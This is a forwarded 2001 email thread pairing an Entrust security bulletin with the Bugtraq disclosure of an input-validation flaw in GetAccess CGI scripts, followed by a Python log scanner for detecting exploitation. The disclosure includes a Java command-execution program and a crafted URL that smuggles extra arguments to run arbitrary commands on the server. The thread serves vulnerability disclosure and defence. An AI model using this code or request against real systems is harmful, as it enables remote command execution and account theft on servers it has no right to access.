I did not see Entrust's answer posted to bugtraq so I'm sending it.

Pavel M.

-----Original Message-----
From: GetAccess Support [mailto:getaccess.support@entrust.com]
Sent: 30 July 2001 16:37
To: 'MARTAK,PAVEL (HP-Czechia,ex1)'
Subject: RE: Entrust - getAccess

Good morning Pavel.

I've included the press release and patch details below. Please let me know if you need clarification.

Sincerely,
Jeff

Entrust Security Bulletin E01-001
==================================

Subject: Entrust GetAccess(tm) CGI Script Vulnerability
Originally posted: July 27, 2001

Summary
=======
An internet newsgroup posting on BUGTRAQ has identified a vulnerability in Entrust GetAccess that could allow unauthorized execution of Java programs installed on GetAccess web servers. This vulnerability has been confirmed by Entrust and a patch is forthcoming.

Detailed information on this issue has been posted to the Entrust customer extranet on both the Entrust GetAccess Portal (https://login.encommerce.com/private/docs/techSupport/Patches-BugFix/e01-001.html) and the Entrust Customer Support Extranet (https://www.entrust.com/support/resources/recentsecuritynotes.htm).

If you have trouble reaching the portals, please call: within North America 877-754-7878, elsewhere 613-270-3700. A hotline has been established for the weekend of July 28th/29th, at +1 613 220 8357.

Affected Software Versions
==========================
- Entrust GetAccess, all versions and platforms
- Specifically, servers running the Access Service, administration application, or runtimes.

Patch Availability
==================
Patches for this vulnerability will be posted to the Entrust customer support extranet on or before Sunday, July 29th 2001.

==================
(c) Entrust Inc. 2001

Jeff McGrath
Web Security Team
getAccess Integration
Entrust, Inc.
"Securing the Internet"
Customer Support Phone: 1 877 PKI SUPT
mailto:support@entrust.com
http://www.entrust.com

-----Original Message-----
From: MARTAK,PAVEL (HP-Czechia,ex1) [mailto:pavel_martak@hp.com]
Sent: Monday, July 30, 2001 2:51 AM
To: support@entrust.com
Subject: FW: Entrust - getAccess

This was announced in BUGTRAQ.

PavelM

-----Original Message-----
From: rudi carell [mailto:rudicarell@hotmail.com]
Sent: 27 July 2001 13:34
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Entrust - getAccess

hola friends,

getAccess[tm] is used as a single-sign-on system often used for large internet-portals.

--- snip (http://www.entrust.com) ---
Entrust GetAccess[tm] offers the most comprehensive solution for consistently deploying and enforcing basic and enhanced security across online applications, from Web browsers, to enterprise applications and legacy database systems.
--- snip ---

problem description:

due to missing input-validation it is possible to run(start) java-programs on the "getaccess"-machine.

combined with publicly accessible uploads or any other possibility to create class-files on the server this vulnerability could be used to run arbitrary system commands on the target machine (or change getAccess parameters and steal any user account you want BTW).

it should also be possible (but not proven yet) to exploit default-, install- or demo classes within Java or getAccess which would make the file-upload(creation) part unneeded! (uninstall.class is very likely an effective DOS)

Example:

find exploitable getAccess-class (one which accepts params!)
or upload a "command" program:

--- cut here (example cmd.java) ---
import java.io.*;

public class cmd {
    public static void main(String args[]) {
        String s = null;
        try {
            // run the command built from the first two arguments
            Process p = Runtime.getRuntime().exec(args[0]+" "+args[1]);
            BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
            BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));
            // CGI header, so the output comes back in the HTTP response
            System.out.println("Content-type: text/html\n\n");
            while ((s = stdInput.readLine()) != null) {
                System.out.println(s);
            }
            while ((s = stdError.readLine()) != null) {
                System.out.println(s);
            }
            System.exit(0);
        } catch (IOException e) {
            e.printStackTrace();
            System.exit(-1);
        }
    }
}
--- cut here ---

later then .. a http-request to :

http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

.. will run "/whereever/cmd.class" and execute "/bin/ls -alsi"

Summary:

object: *.gas.bat (all the getAccess cgi-shell-scripts)
class: input validation
remote: yes
vendor: has been informed with a separate e-mail ( entrust@entrust.com )

(and BTW. i would NEVER EVER recommend to use shell-scripts for authentication purposes!)

nice day,

rC

rudicarell@hotmail.com
security@freefly.com
http://www.freefly.com/security/
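
Added example, not part of the original post or of Entrust's bulletin: a log check a defender could run over web server access logs to find requests that append extra command-line words to a *.gas.bat script, as in the request shown above. The common log format, the function names and the sample entries are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a common-log-format entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A *.gas.bat CGI script followed by optional extra path info.
GAS_BAT = re.compile(r"^(?P<script>/[^?\s]*?\.gas\.bat)(?P<extra>/[^?]*)?", re.I)


def suspicious_path_info(target):
    """Return decoded extra path info that would split into extra
    command-line words or options, else None."""
    m = GAS_BAT.match(target)
    if not m or not m.group("extra"):
        return None
    # Decode twice so double-encoded separators (%2520) are also seen.
    decoded = unquote(unquote(m.group("extra")))
    has_space = re.search(r"\s", decoded)
    has_option = re.search(r"(?:^|[\s/])-\w", decoded)
    return decoded if has_space or has_option else None


def scan(log_lines):
    """Return [(line_number, decoded_path_info)] for flagged requests."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        found = suspicious_path_info(m.group("target")) if m else None
        if found is not None:
            hits.append((n, found))
    return hits


# Constructed sample entries (documentation IP range), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [27/Jul/2001:13:40:01 +0200] "GET /sek-bin/login.gas.bat HTTP/1.0" 200 512',
    '192.0.2.10 - - [27/Jul/2001:13:40:07 +0200] "GET /sek-bin/login.gas.bat/help HTTP/1.0" 200 310',
    '192.0.2.99 - - [27/Jul/2001:13:41:15 +0200] "GET /sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi HTTP/1.0" 200 2048',
    '192.0.2.99 - - [27/Jul/2001:13:41:30 +0200] "GET /sek-bin/login.gas.bat/x%2520-classpath HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for lineno, info in scan(SAMPLE):
        print(f"line {lineno}: suspicious path info {info!r}")
```

Any hit is worth reviewing together with the server's record of what the script executed; a clean result only covers the log files that were scanned.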